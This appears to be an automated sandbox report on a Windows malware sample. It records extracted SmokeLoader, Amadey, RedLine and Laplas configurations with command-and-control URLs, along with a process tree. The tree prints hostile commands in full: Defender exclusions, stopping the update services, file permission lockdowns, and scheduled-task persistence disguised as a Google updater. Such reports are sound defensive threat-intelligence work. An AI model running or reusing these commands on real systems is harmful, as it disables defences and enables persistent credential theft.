Analysis
-
max time kernel
112s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230831-en -
resource tags
arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system -
submitted
10-09-2023 21:53
Static task
static1
Behavioral task
behavioral1
Sample
6c08c9afcead35f8fa033752e7925e8da5ab77d4bb93a6f027819f4136617179.exe
Resource
win10v2004-20230831-en
General
-
Target
6c08c9afcead35f8fa033752e7925e8da5ab77d4bb93a6f027819f4136617179.exe
-
Size
247KB
-
MD5
6e6699cc35aa6fc76b259680a1ae15cd
-
SHA1
a6efd56e3d0cdd8ce2569a58654d0aa0123d5a83
-
SHA256
6c08c9afcead35f8fa033752e7925e8da5ab77d4bb93a6f027819f4136617179
-
SHA512
70585143f7fdb6e5997aa978995c31f4e6eb0814e635f29fbcb8f4c76e5a81dd5292bd946ce17065eb1e1100c6c26ee99cd49a15dd4b84e6ebb767bcdcec7a11
-
SSDEEP
6144:vZGUMz6DCGbAR/VeDC1tAOGcCMfswurBiIg:vlMzaC+Uj1ZfswurBiIg
Malware Config
Extracted
smokeloader
2022
http://77.91.68.29/fks/
Extracted
amadey
3.83
http://5.42.65.80/8bmeVwqx/index.php
-
install_dir
207aa4515d
-
install_file
oneetx.exe
-
strings_key
3e634dd0840c68ae2ced83c2be7bf0d4
Extracted
redline
amadey_api
amadapi.tuktuk.ug:11290
-
auth_value
a004bea47cf55a1c8841d46c3fe3e6f5
Extracted
laplas
http://lpls.tuktuk.ug
-
api_key
a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
resource yara_rule behavioral1/memory/3832-57-0x0000000000050000-0x00000000001DE000-memory.dmp family_redline behavioral1/memory/4460-58-0x00000000007A0000-0x00000000007FA000-memory.dmp family_redline behavioral1/memory/3832-63-0x0000000000050000-0x00000000001DE000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 5044 created 3264 5044 latestX.exe 18 PID 5044 created 3264 5044 latestX.exe 18 PID 5044 created 3264 5044 latestX.exe 18 PID 5044 created 3264 5044 latestX.exe 18 PID 4208 created 3264 4208 msedge.exe 18 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ winlog.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ntlhost.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts latestX.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion winlog.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion winlog.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ntlhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ntlhost.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\Control Panel\International\Geo\Nation A833.exe Key value queried \REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\Control Panel\International\Geo\Nation oneetx.exe -
Executes dropped EXE 10 IoCs
pid Process 3832 A1E8.exe 3088 A833.exe 4292 A95C.exe 4540 oneetx.exe 5044 latestX.exe 1092 taskhost.exe 4016 winlog.exe 4208 msedge.exe 4804 oneetx.exe 4252 ntlhost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" winlog.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA winlog.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ntlhost.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{3249926C-12E7-428C-A65C-495EF035D1EC}.catalogItem svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4016 winlog.exe 4252 ntlhost.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 4700 set thread context of 3504 4700 6c08c9afcead35f8fa033752e7925e8da5ab77d4bb93a6f027819f4136617179.exe 89 PID 3832 set thread context of 4460 3832 A1E8.exe 104 PID 1092 set thread context of 1772 1092 taskhost.exe 120 -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4908 sc.exe 4424 sc.exe 2600 sc.exe 1152 sc.exe 4624 sc.exe 3624 sc.exe 4904 sc.exe 3800 sc.exe 1016 sc.exe 4248 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 440 4700 WerFault.exe 84 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AppLaunch.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AppLaunch.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AppLaunch.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2980 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU svchost.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 84 Go-http-client/1.1 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3504 AppLaunch.exe 3504 AppLaunch.exe 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE 3264 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3264 Explorer.EXE -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3504 AppLaunch.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3264 Explorer.EXE Token: SeCreatePagefilePrivilege 3264 Explorer.EXE Token: SeShutdownPrivilege 3264 Explorer.EXE Token: SeCreatePagefilePrivilege 3264 Explorer.EXE Token: SeShutdownPrivilege 3264 Explorer.EXE Token: SeCreatePagefilePrivilege 3264 Explorer.EXE Token: SeShutdownPrivilege 3264 Explorer.EXE Token: SeCreatePagefilePrivilege 3264 Explorer.EXE Token: SeShutdownPrivilege 3264 Explorer.EXE Token: SeCreatePagefilePrivilege 3264 Explorer.EXE Token: SeShutdownPrivilege 3264 Explorer.EXE Token: SeCreatePagefilePrivilege 3264 Explorer.EXE Token: SeShutdownPrivilege 3264 Explorer.EXE Token: SeCreatePagefilePrivilege 3264 Explorer.EXE Token: SeShutdownPrivilege 3264 Explorer.EXE Token: SeCreatePagefilePrivilege 3264 Explorer.EXE Token: SeShutdownPrivilege 3264 Explorer.EXE Token: SeCreatePagefilePrivilege 3264 Explorer.EXE Token: SeDebugPrivilege 4292 A95C.exe Token: SeDebugPrivilege 4460 vbc.exe Token: SeShutdownPrivilege 3264 Explorer.EXE Token: SeCreatePagefilePrivilege 3264 Explorer.EXE Token: SeShutdownPrivilege 3264 Explorer.EXE Token: SeCreatePagefilePrivilege 3264 Explorer.EXE Token: SeDebugPrivilege 1772 vbc.exe Token: SeShutdownPrivilege 3264 Explorer.EXE Token: SeCreatePagefilePrivilege 3264 Explorer.EXE Token: SeShutdownPrivilege 3264 Explorer.EXE Token: SeCreatePagefilePrivilege 3264 Explorer.EXE Token: SeShutdownPrivilege 3264 Explorer.EXE Token: SeCreatePagefilePrivilege 3264 Explorer.EXE Token: SeShutdownPrivilege 3264 Explorer.EXE Token: SeCreatePagefilePrivilege 3264 Explorer.EXE Token: SeShutdownPrivilege 3264 Explorer.EXE Token: SeCreatePagefilePrivilege 3264 Explorer.EXE Token: SeDebugPrivilege 1224 powershell.exe Token: SeShutdownPrivilege 4896 powercfg.exe Token: SeCreatePagefilePrivilege 4896 powercfg.exe Token: SeDebugPrivilege 1924 powershell.exe Token: SeShutdownPrivilege 980 powercfg.exe Token: SeCreatePagefilePrivilege 980 powercfg.exe Token: SeShutdownPrivilege 4784 powercfg.exe Token: SeCreatePagefilePrivilege 4784 powercfg.exe Token: SeShutdownPrivilege 4320 powercfg.exe Token: SeCreatePagefilePrivilege 4320 powercfg.exe Token: SeIncreaseQuotaPrivilege 1924 powershell.exe Token: SeSecurityPrivilege 1924 powershell.exe Token: SeTakeOwnershipPrivilege 1924 powershell.exe Token: SeLoadDriverPrivilege 1924 powershell.exe Token: SeSystemProfilePrivilege 1924 powershell.exe Token: SeSystemtimePrivilege 1924 powershell.exe Token: SeProfSingleProcessPrivilege 1924 powershell.exe Token: SeIncBasePriorityPrivilege 1924 powershell.exe Token: SeCreatePagefilePrivilege 1924 powershell.exe Token: SeBackupPrivilege 1924 powershell.exe Token: SeRestorePrivilege 1924 powershell.exe Token: SeShutdownPrivilege 1924 powershell.exe Token: SeDebugPrivilege 1924 powershell.exe Token: SeSystemEnvironmentPrivilege 1924 powershell.exe Token: SeRemoteShutdownPrivilege 1924 powershell.exe Token: SeUndockPrivilege 1924 powershell.exe Token: SeManageVolumePrivilege 1924 powershell.exe Token: 33 1924 powershell.exe Token: 34 1924 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3088 A833.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4700 wrote to memory of 3504 4700 6c08c9afcead35f8fa033752e7925e8da5ab77d4bb93a6f027819f4136617179.exe 89 PID 4700 wrote to memory of 3504 4700 6c08c9afcead35f8fa033752e7925e8da5ab77d4bb93a6f027819f4136617179.exe 89 PID 4700 wrote to memory of 3504 4700 6c08c9afcead35f8fa033752e7925e8da5ab77d4bb93a6f027819f4136617179.exe 89 PID 4700 wrote to memory of 3504 4700 6c08c9afcead35f8fa033752e7925e8da5ab77d4bb93a6f027819f4136617179.exe 89 PID 4700 wrote to memory of 3504 4700 6c08c9afcead35f8fa033752e7925e8da5ab77d4bb93a6f027819f4136617179.exe 89 PID 4700 wrote to memory of 3504 4700 6c08c9afcead35f8fa033752e7925e8da5ab77d4bb93a6f027819f4136617179.exe 89 PID 3264 wrote to memory of 3832 3264 Explorer.EXE 103 PID 3264 wrote to memory of 3832 3264 Explorer.EXE 103 PID 3264 wrote to memory of 3832 3264 Explorer.EXE 103 PID 3832 wrote to memory of 4460 3832 A1E8.exe 104 PID 3832 wrote to memory of 4460 3832 A1E8.exe 104 PID 3832 wrote to memory of 4460 3832 A1E8.exe 104 PID 3832 wrote to memory of 4460 3832 A1E8.exe 104 PID 3832 wrote to memory of 4460 3832 A1E8.exe 104 PID 3264 wrote to memory of 3088 3264 Explorer.EXE 105 PID 3264 wrote to memory of 3088 3264 Explorer.EXE 105 PID 3264 wrote to memory of 3088 3264 Explorer.EXE 105 PID 3264 wrote to memory of 4292 3264 Explorer.EXE 106 PID 3264 wrote to memory of 4292 3264 Explorer.EXE 106 PID 3264 wrote to memory of 4292 3264 Explorer.EXE 106 PID 3088 wrote to memory of 4540 3088 A833.exe 107 PID 3088 wrote to memory of 4540 3088 A833.exe 107 PID 3088 wrote to memory of 4540 3088 A833.exe 107 PID 4540 wrote to memory of 2980 4540 oneetx.exe 108 PID 4540 wrote to memory of 2980 4540 oneetx.exe 108 PID 4540 wrote to memory of 2980 4540 oneetx.exe 108 PID 4540 wrote to memory of 4404 4540 oneetx.exe 110 PID 4540 wrote to memory of 4404 4540 oneetx.exe 110 PID 4540 wrote to memory of 4404 4540 oneetx.exe 110 PID 4404 wrote to memory of 3504 4404 cmd.exe 112 PID 4404 wrote to memory of 3504 4404 cmd.exe 112 PID 4404 wrote to memory of 3504 4404 cmd.exe 112 PID 4404 wrote to memory of 4428 4404 cmd.exe 113 PID 4404 wrote to memory of 4428 4404 cmd.exe 113 PID 4404 wrote to memory of 4428 4404 cmd.exe 113 PID 4404 wrote to memory of 4964 4404 cmd.exe 114 PID 4404 wrote to memory of 4964 4404 cmd.exe 114 PID 4404 wrote to memory of 4964 4404 cmd.exe 114 PID 4404 wrote to memory of 4744 4404 cmd.exe 116 PID 4404 wrote to memory of 4744 4404 cmd.exe 116 PID 4404 wrote to memory of 4744 4404 cmd.exe 116 PID 4404 wrote to memory of 920 4404 cmd.exe 115 PID 4404 wrote to memory of 920 4404 cmd.exe 115 PID 4404 wrote to memory of 920 4404 cmd.exe 115 PID 4404 wrote to memory of 5100 4404 cmd.exe 117 PID 4404 wrote to memory of 5100 4404 cmd.exe 117 PID 4404 wrote to memory of 5100 4404 cmd.exe 117 PID 4540 wrote to memory of 5044 4540 oneetx.exe 118 PID 4540 wrote to memory of 5044 4540 oneetx.exe 118 PID 4540 wrote to memory of 1092 4540 oneetx.exe 119 PID 4540 wrote to memory of 1092 4540 oneetx.exe 119 PID 4540 wrote to memory of 1092 4540 oneetx.exe 119 PID 1092 wrote to memory of 1772 1092 taskhost.exe 120 PID 1092 wrote to memory of 1772 1092 taskhost.exe 120 PID 1092 wrote to memory of 1772 1092 taskhost.exe 120 PID 1092 wrote to memory of 1772 1092 taskhost.exe 120 PID 1092 wrote to memory of 1772 1092 taskhost.exe 120 PID 4540 wrote to memory of 4016 4540 oneetx.exe 121 PID 4540 wrote to memory of 4016 4540 oneetx.exe 121 PID 4540 wrote to memory of 4208 4540 oneetx.exe 122 PID 4540 wrote to memory of 4208 4540 oneetx.exe 122 PID 4016 wrote to memory of 4252 4016 winlog.exe 124 PID 4016 wrote to memory of 4252 4016 winlog.exe 124 PID 2604 wrote to memory of 4908 2604 cmd.exe 129 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3264 -
C:\Users\Admin\AppData\Local\Temp\6c08c9afcead35f8fa033752e7925e8da5ab77d4bb93a6f027819f4136617179.exe"C:\Users\Admin\AppData\Local\Temp\6c08c9afcead35f8fa033752e7925e8da5ab77d4bb93a6f027819f4136617179.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3504
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4700 -s 1363⤵
- Program crash
PID:440
-
-
-
C:\Users\Admin\AppData\Local\Temp\A1E8.exeC:\Users\Admin\AppData\Local\Temp\A1E8.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
-
-
C:\Users\Admin\AppData\Local\Temp\A833.exeC:\Users\Admin\AppData\Local\Temp\A833.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3088 -
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4540 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F4⤵
- Creates scheduled task(s)
PID:2980
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit4⤵
- Suspicious use of WriteProcessMemory
PID:4404 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:3504
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:N"5⤵PID:4428
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:R" /E5⤵PID:4964
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\207aa4515d" /P "Admin:N"5⤵PID:920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:4744
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\207aa4515d" /P "Admin:R" /E5⤵PID:5100
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000457001\latestX.exe"C:\Users\Admin\AppData\Local\Temp\1000457001\latestX.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
PID:5044
-
-
C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exeC:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4252
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:4208
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\A95C.exeC:\Users\Admin\AppData\Local\Temp\A95C.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1224
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4908
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4424
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3624
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2600
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4904
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:2908
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4896
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:980
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4784
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4320
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:4988
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:2412
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1152
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4624
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3800
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1016
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4248
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:4392
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4532
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:1928
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:3740
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:3204
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:1184
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:4516
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:1560
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵
- Drops file in System32 directory
- Checks processor information in registry
- Enumerates system info in registry
PID:1724
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4700 -ip 47001⤵PID:3632
-
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exeC:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe1⤵
- Executes dropped EXE
PID:4804
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵PID:4340
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Modify Registry
1Scripting
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.6MB
MD5bae29e49e8190bfbbf0d77ffab8de59d
SHA14a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA5129e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2
-
Filesize
2KB
MD59cbca2a895534f39fb0c6e12b43469d1
SHA11391323f936359e7fe7a610e43018b4677603cb1
SHA256646ce19104c8ee217cabe6ed69d84ffffdf114eff9ecfbe35163a3e96e5aa1cd
SHA5121cceac4aa4d45fa92bd6dc4d44241c1086628a696cf69ec49f29cd761fa85f48aa45227937c7f5b068d746da10f68e4e6dba4ab30566a86bdab1ed5808259d4f
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
